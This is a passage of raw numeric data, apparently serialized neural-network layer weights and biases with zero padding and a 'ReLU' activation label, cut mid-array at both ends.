0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5146, 0.7295, 0.5664, -0.06836, 0.5347, 0.004074, -0.2347, -0.5317, 0.3174, -0.6475, 0.466, -0.451, 1.54, 0.511, -0.2155, 0.1105, -0.0405, 0.569, -0.492, -0.544, -0.0384, -1.121, -0.6455, 1.601, -0.412, 0.4153, -0.2101, 0.4639, 0.01519, 0.2666, 0.3645, 0.2284, -0.3508, -0.3071, -0.437, 0.5596, -0.2327, -1.061, 0.1868, 0.5454, -0.4976, -0.865, 1.512, -0.207, -0.11096, 0.3865, -0.0383, 0.5195, 0.2964, 0.3135], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.05164, 0.2708, 0.3374, -0.311, -0.3335, 0.2401, -1.192, -0.1437, 0.4226, 0.5654, -0.2878, -1.023, -0.5127, 0.552, -0.8315, -0.3633, 1.698, 2.127, -1.403, -0.8374, -0.0299, -2.168, 0.552, 0.6724, 0.3047, 0.5728, 0.2651, 0.2003, 0.005726, 0.847, 0.7773, 1.046, 0.12396, 0.488, 0.378, -0.714, 0.1917, 1.394, 0.5684, -0.4612, 0.7886, -0.3237, -1.339, 0.113, -1.551, 0.5576, 0.02036, 0.06213, 0.513, 1.087], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.525, -0.0544, -1.017, -0.584, -1.055, 0.4988, -0.302, -0.2737, -0.01248, 1.802, -0.1492, -0.5796, 0.0612, -0.5234, -0.8125, 0.05762, 0.04675, -0.00181, -0.284, 0.2212, 1.294, 0.4768, -0.1099, -0.02304, 0.008316, -0.5366, -0.694, 0.6177, 0.037, 0.05145, -2.318, 0.421, 0.5923, 0.596, -0.033, -0.1787, 0.267, -0.8706, -0.04016, 0.09784, -0.84, -0.1273, -0.00748, 0.1499, 0.5503, 0.004307, 0.03665, 0.0806, -0.515, 0.02437], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0444, -0.4668, -0.3203, 0.683, -0.1166, 0.0969, 0.1893, -0.423, 0.168, 0.2012, 0.0788, -0.02701, 1.4795, 0.1768, 0.7686, -0.1038, 0.4824, 0.4558, -0.483, 0.51, 0.498, 1.633, 0.1247, 2.076, 0.02094, 0.3926, -0.4155, -0.2815, 0.03745, -0.3074, 1.118, 1.164, -4.508, 0.08417, 0.1631, -0.1957, -0.1311, 0.525, -0.11127, -0.1218, 0.0648, 0.2372, 1.985, -0.07245, -0.2925, 0.627, 0.01845, -0.0786, -0.1891, 0.0744], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.837, -0.4517, -0.2272, -1.892, 0.6973, 0.597, -0.9126, -3.637, 0.2964, 1.27, 0.013336, -0.3174, -0.2563, 0.6396, 0.7563, 0.2852, 0.486, -1.42, 0.0483, 0.7256, 2.18, -1.342, 0.545, 0.3118, -0.922, 0.3237, 1.84, 0.3137, -0.02731, -0.1791, 2.57, 0.3174, 0.4307, 0.3635, 0.02158, -0.1465, -0.908, -0.799, -0.1092, -0.4885, -0.874, 0.8857, -0.1005, 0.2656, -0.9917, -0.1153, -0.002779, 0.887, 0.2081, 0.1606], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.9873, -0.1188, 0.1121, 0.01542, -0.3738, 0.0571, -0.519, 0.7275, 0.9443, 0.2438, -0.8525, 0.2988, 0.0541, 0.7534, 0.00644, 0.01516, -0.126, 0.02715, 1.59, 0.00545, -0.0424, -5.52, 0.2827, -0.3362, 0.1686, -0.04956, 1.108, -2.96, -0.0114, -0.2815, 0.03026, -0.02835, 1.144, 0.2542, 0.0917, -0.0177, -0.928, 0.2708, 0.1523, -0.02423, -0.297, -0.906, 0.2654, -0.717, -0.8823, 0.198, -0.049, 0.12463, -0.2427, 0.198], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2208, -1.904, -0.11707, -1.613, -1.1, 0.25, 0.5244, -0.279, 0.928, 0.9307, 0.12305, -0.1427, 0.2532, 1.896, -0.01617, -0.216, -0.1653, 0.0416, -0.5938, 0.528, 0.3276, -0.2874, 0.3489, 1.712, 0.423, 0.658, 0.1021, 0.03082, -0.01488, -0.1467, 2.035, -0.2166, 0.00872, -0.07623, 0.2206, 0.512, 0.0954, 1.49, -0.3901, 0.519, 0.2844, -0.6113, -1.385, 0.2311, -2.504, 1.033, -0.003036, 0.2333, 0.1934, 0.2092], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.02205, 0.05536, -0.05484, 2.545, -0.566, 0.1685, 0.7256, 0.4417, -0.2375, 0.4775, -0.212, 0.02953, -0.1876, -0.1186, 2.725, -0.145, -0.2328, -0.1913, 1.357, -0.4949, -0.464, -1.606, -0.03406, 0.1593, -0.1332, 0.03326, 0.6694, -1.361, -0.04895, -0.2607, 0.4248, 1.51, 2.25, -0.2556, 0.507, 0.4346, -0.7363, 1.049, 0.266, 0.003632, 0.02629, 0.678, -0.2083, -0.227, -0.1895, -0.001458, -0.02191, 1.231, -0.08014, -0.07623], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.678, 1.14, -0.2288, 0.5557, -0.572, 0.8936, 0.815, 0.1694, -0.2098, -0.3772, 0.2048, 0.1536, -0.421, 0.3884, 0.2329, -0.3552, 0.4885, 0.05405, 0.303, 0.927, 0.2903, 0.623, 0.554, -0.11456, -0.6904, -0.1205, 0.676, 0.4656, -0.002857, -0.05475, 1.559, -1.943, 0.1848, -0.4624, -0.2642, -0.1862, -0.2115, 0.1338, -0.198, -0.2854, -0.4355, -0.56, -0.06836, 0.2179, 1.24, -0.4805, 0.00834, 0.2625, 0.05118, -0.394], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3027, -0.619, 0.2386, -0.8105, -0.339, -0.2993, 0.6245, 0.2463, -0.794, 0.3223, 0.2084, 0.1656, 0.7817, -0.01764, 0.1711, -0.1963, -0.3447, -0.966, -0.4102, -1.379, -0.1976, 1.354, 0.05176, 2.39, 0.1451, 0.005306, -0.01021, -0.575, -0.0246, 0.552, -3.191, 0.3708, -0.527, -0.1332, 0.5474, -0.005318, -0.6377, 0.01469, -0.004456, 1.148, 0.493, 0.261, 0.677, -0.02544, -0.663, 1.263, 0.0002342, 0.08246, -0.1826, 1.222], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3535, 0.06696, 0.04938, 1.115, -0.1174, 0.01294, -0.5957, 1.251, 0.0401, 1.054, -0.1326, 0.1432, -0.2654, -0.5557, 1.349, 1.304, 0.335, 1.882, -1.96, -1.125, -2.22, 0.704, 0.2607, 0.1775, 0.4775, -0.06192, -1.012, -0.10345, 0.02687, 0.3127, -3.852, -0.3328, -0.738, 0.6836, -0.1511, -0.358, 0.9043, -0.565, -0.3464, -0.09705, 0.4634, -0.3245, -0.1956, -0.01214, 0.7104, -0.00606, 0.02502, 0.1515, 0.3435, -0.02577], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.4197, 0.3071, -0.0684, -0.2852, 0.752, -0.297, -0.639, 0.6206, 0.241, 0.95, -0.1753, 0.3916, 0.10297, -0.715, -0.1461, 0.2041, 0.694, 0.838, -0.00613, 0.768, 0.2546, 2.334, 1.259, -0.6816, 0.7153, -0.333, 0.2499, 0.551, 0.0193, -0.3474, -1.285, 0.8296, -0.153, 0.3545, 1.263, 0.0471, -0.338, 1.591, 0.8457, 0.574, 0.3147, 0.285, -0.1682, -0.341, 0.3901, 0.3176, -0.01703, 0.292, -0.2297, 0.2805], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.604, -0.2505, 0.1768, -0.4854, 0.5186, 0.4202, 0.7646, -0.501, 0.0003655, 0.2866, -0.1996, -0.0688, -0.0904, 0.10034, 1.873, -0.5503, -0.2378, -0.04517, 0.0369, -1.014, -1.191, -0.3647, -0.0852, 0.178, 0.1915, -0.6904, -0.1082, -1.068, 0.04382, 0.05374, 0.298, 1.281, -3.408, -0.01396, 0.774, 0.09064, 1.231, 0.3105, -0.4216, -0.3645, 0.1647, 0.96, 0.1676, -0.3157, 0.03152, -0.075, 0.04245, -0.02615, 0.1312, 0.1909], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.631, -0.137, 0.1929, 1.833, -1.314, 0.3633, -0.703, 0.1945, 0.0867, -0.3916, 0.2443, -0.1306, 1.042, 0.0716, 0.04477, -0.01127, -0.06137, 0.01642, -0.2837, 0.559, -1.023, 1.701, -0.52, -0.3572, 0.2317, 0.4136, 0.8315, -0.6523, 0.01236, 1.014, -0.09216, 1.859, -0.275, 0.003967, 0.499, -0.05838, -0.542, -0.509, 1.442, -0.1499, 0.0668, 0.2289, -0.189, -0.1451, 0.7134, -0.2306, 0.02992, -0.4338, 0.1184, 1.129], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.484, -0.693, 0.3877, -1.921, 1.291, -0.1266, -1.125, -0.8306, 0.9536, 0.4604, 0.352, -0.09503, -0.07434, -0.512, -0.718, 0.3647, 0.589, 1.08, -0.3235, -0.9697, -0.3345, -1.965, -1.154, 0.939, 0.641, -0.4294, -0.5176, -0.2129, 0.01942, 0.8003, -0.04337, 0.754, 0.1137, -0.195, 0.2693, 0.6475, 0.8486, 0.02275, -1.174, 0.8354, -0.5415, -0.01152, -1.272, -0.0991, -0.7124, 0.3096, 0.03644, 0.3535, 0.5103, -0.06647], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1626, 0.0806, 0.1099, -2.16, 1.559, -0.221, 0.5493, -1.262, 0.325, 1.043, 0.02269, 0.02127, 0.5356, 0.9487, -0.2915, -0.887, 0.587, 0.9937, 0.314, -0.728, -0.01531, -0.06305, 0.2705, -0.5327, 1.483, 0.4817, -1.033, 0.585, -0.01924, -0.0841, 0.94, 0.929, 0.03543, 0.713, 0.8657, -0.4568, 0.1107, -0.7544, 0.03004, -0.2551, 0.7583, 0.073, -0.8003, 0.4766, 0.2854, 0.1829, -0.01607, 0.629, 0.0888, 0.4172], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.01382, -2.838, 0.1154, 1.488, 0.315, -0.2935, 0.339, 0.8354, -0.7305, 0.3196, 0.1785, 0.2517, -0.865, -0.5366, -0.000729, 0.2264, -1.246, 0.678, 0.445, 0.2023, 0.3071, 1.541, 0.01749, 0.0373, -1.042, 0.2092, -0.555, 0.00669, -0.01894, 0.3765, 1.137, 0.675, -0.6484, -0.1545, 0.633, 0.3853, -0.0822, 1.066, -0.3752, 0.5757, 0.1757, -0.8047, 0.964, 0.5356, 0.1648, -1.08, -0.02248, 0.1965, 0.0715, -0.6235], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.928, -0.00596, 0.3364, -0.1692, -0.986, 0.1415, -0.781, -0.2377, 0.10693, -0.579, 0.099, -0.618, 0.07495, 0.8022, 1.215, 1.04, -0.2355, -1.392, -0.4958, 0.51, -0.995, -1.666, -0.3606, 0.03525, 1.348, -0.10394, 0.00431, -1.479, -0.03326, -0.1875, 1.259, 0.623, -0.4355, 0.7627, -0.0678, 0.4458, -0.2374, -0.673, -0.1741, -0.305, 1.561, 0.2341, -0.3318, 0.2491, -0.4963, -0.0882, -0.0321, 1.452, -2.316, -0.07935], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.6343, -0.412, -3.855, 0.8833, 0.05988, -0.6724, -0.983, -0.04044, 0.359, 2.043, -0.691, -0.3076, 0.3096, -0.10126, -0.7227, 0.407, 0.1816, 1.643, 0.1073, -0.139, -0.915, -0.9067, -0.58, 0.3416, -0.2029, -0.586, -0.1371, 0.3933, -0.04364, -0.321, -0.739, 0.3833, -0.8296, -0.3938, -0.496, 0.688, -0.1299, 0.1477, -0.10016, -2.443, 0.653, 0.601, -0.05347, -0.678, -1.019, 0.006668, 0.0092, 0.7163, 0.62, -0.4175], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2245, -0.232, -0.8936, 1.19, 0.01415, -0.7627, 0.9043, -0.6655, -0.4185, 1.469, -0.8364, 0.2822, 0.9194, 0.4565, 0.4546, 0.4136, -0.9976, -0.5225, 0.6543, 0.0382, -0.3145, 0.1709, 0.091, -0.519, 0.811, -0.78, 0.5044, -0.2576, -0.03183, 0.1205, 0.94, 0.1786, -0.1956, 0.7935, -0.7617, -0.15, -0.02278, 1.351, 0.0408, -0.289, 0.577, -0.6353, -0.06964, -1.54, -0.9272, -0.314, -0.007053, -0.07916, 0.648, 0.544], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.164, -0.05658, -0.2954, 1.029, 0.3372, 0.2017, -0.589, 0.1233, 0.2247, -0.2798, 0.357, 0.1326, 1.438, -0.372, -0.8027, -0.04108, -0.02632, 1.264, -0.502, 0.3735, -0.2073, 1.873, -0.05432, 2.516, -0.0881, 0.2264, -0.159, 1.079, -0.013466, 0.1874, -0.2666, 1.763, -0.4126, -0.0733, -0.1647, -0.0461, 0.3567, 0.1449, -0.1805, -0.04514, 0.2554, 0.0998, 1.042, -0.2656, 0.03198, 2.402, 0.02142, -0.042, 0.05655, 1.07]]
[-0.838822, -0.444064, 0.748647, -0.26248, 0.754242, 0.713487, 0.490337, 0.792159, 0.888753, 0.459342, -0.175118, 0.949957, -0.928814, -0.473677, 0.439304, -0.00998504, -0.349078, 0.528565, 0.412139, 0.688213, 0.958401, -0.33694, -0.391604, -0.00917568, -0.0195476, -0.348621, -0.453349, -0.76955, -0.593454, -0.32294, -0.920786, 0.288749, -0.952069, -0.104851, -1.17227, -1.09622, -1.4131, 0.20675, -0.297869, -1.11681, -0.894663, 0.158122, -0.618077, -0.404634, -1.21882, -0.600746, -1.07492, -0.667219, -0.536134, -0.452719, -0.839, -0.444, 0.7485, -0.2625, 0.7544, 0.7134, 0.4902, 0.792, 0.8887, 0.4592, -0.1752, 0.95, -0.9287, -0.4736, 0.4392, -0.00999, -0.349, 0.529, 0.412, 0.688, 0.9585, -0.337, -0.3916, -0.00918, -0.01955, -0.3486, -0.4534, -0.7695, -0.5933, -0.323, -0.921, 0.2888, -0.952, -0.10486, -1.172, -1.097, -1.413, 0.2068, -0.2979, -1.117, -0.8945, 0.1581, -0.618, -0.4045, -1.219, -0.6006, -1.075, -0.667, -0.536, -0.4526]
ReLU
[[0.29329, -0.218654, -0.549183, 0.22792, -0.114775, 0.113745, -0.070574, 0.0224154, 0.762545, 0.0477132, -0.127271, 0.000213102, -0.342519, 0.0566823, 0.0840251, -0.000594736, 0.0995126, 0.109976, 0.213004, 0.0833588, -0.265225, -0.191404, 0.157173, -0.0320786, 0.00409382, -0.182032, 0.326567, -0.357178, 0.640777, 0.215446, -0.196507, 0.122053, 0.206608, 0.497091, -0.131647, 0.00659788, -0.343404, -0.118135, -0.0213549, -0.395837, 0.037264, 0.308757, 0.0341949, -0.144027, -0.302195, -0.139866, 0.0270174, 0.251558, -0.359226, 0.470901, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [1.24949, 1.08846, 0.367508, -0.253265, 0.156709, 0.368132, -0.335936, -0.165754, 0.15152, -0.121147, 0.780214, -0.28483, -1.30203, 0.389581, 0.109342, -0.0411583, 0.330815, 1.05821, -0.424809, -0.1078, -0.490332, 0.832573, 0.280489, -0.0111262, -0.0437485, 0.303693, 0.24413, 0.498489, 0.148951, 0.444397, -0.109783, 0.627072, 1.04431, 0.22518, -3.00848, 0.334879, -0.261703, -0.581005, -0.838798, -0.0375312, 0.0430156, -0.0293076, 0.41049, -0.669078, -0.28665, -0.50927, 0.816973, 0.604573, -0.0510528, 0.485696, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.516689, 0.188573, 0.1539, 0.0683803, -0.0218735, 0.37739, -0.321765, -0.623313, 0.0879568, -0.294029, 0.0859447, -0.0386633, -0.201001, -0.442731, 0.990714, -0.0429968, -0.168209, -0.399614, -0.0590701, 0.211837, -0.0147021, -0.458955, -0.252123, -0.0306582, 0.0172476, 0.15906, 0.329446, 0.498418, -0.262215, 0.249915, 0.276292, -0.420737, -0.430038, 0.142035, 0.0571227, -0.232666, -0.165299, 0.0358767, 0.263602, 0.125926, 0.294122, 
0.0636838, -0.0239535, -0.185323, 0.450232, 0.148458, -0.600504, -0.72835, 0.0983809, -0.0776871, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.523365, -1.1768, 0.2394, 0.294089, -0.0290111, 0.292261, -0.0482682, 0.271242, 0.120938, -0.115028, -0.216612, 0.497935, 0.377178, -0.629046, 0.202047, -0.0394781, 0.269632, -0.242836, -0.171539, -0.678277, 0.663372, -0.393727, -0.0881842, 0.0297598, 0.0435318, 0.320854, 0.316377, -1.13962, 0.120425, 0.0108914, -0.275979, -0.240492, -0.131277, -0.894161, -0.408075, -0.338061, -0.755773, -0.874971, -0.0615467, 0.173906, -0.203296, 0.54136, 0.2073, -0.190242, 0.115566, 0.482389, 0.0139929, 0.129507, 0.41511, -0.168015, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-4.63983, 0.151639, 0.15938, -0.192297, 0.359868, -0.379765, 0.0802711, 0.382811, 0.704535, -0.424408, 0.342411, 0.607665, -0.513556, -0.505145, 0.634796, 0.0169458, -0.0168074, -0.11984, -0.183137, -0.214978, 0.0434535, -0.575842, -0.961149, -0.0168695, 0.00911016, 0.89859, 0.206176, -0.709384, -1.36601, 0.312972, -0.25026, 0.131526, -0.220566, 0.330025, -0.955898, 0.147051, 0.638369, 0.179771, 0.224727, 0.820985, -0.232776, 0.442288, 0.38936, 0.179038, 0.376713, -0.478651, -0.0865827, 0.992032, -0.867595, 0.110182, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.725576, -0.110651, 0.00871704, -0.0551965, 1.04627, -0.106633, -1.70031, 0.215941, -0.0979674, 
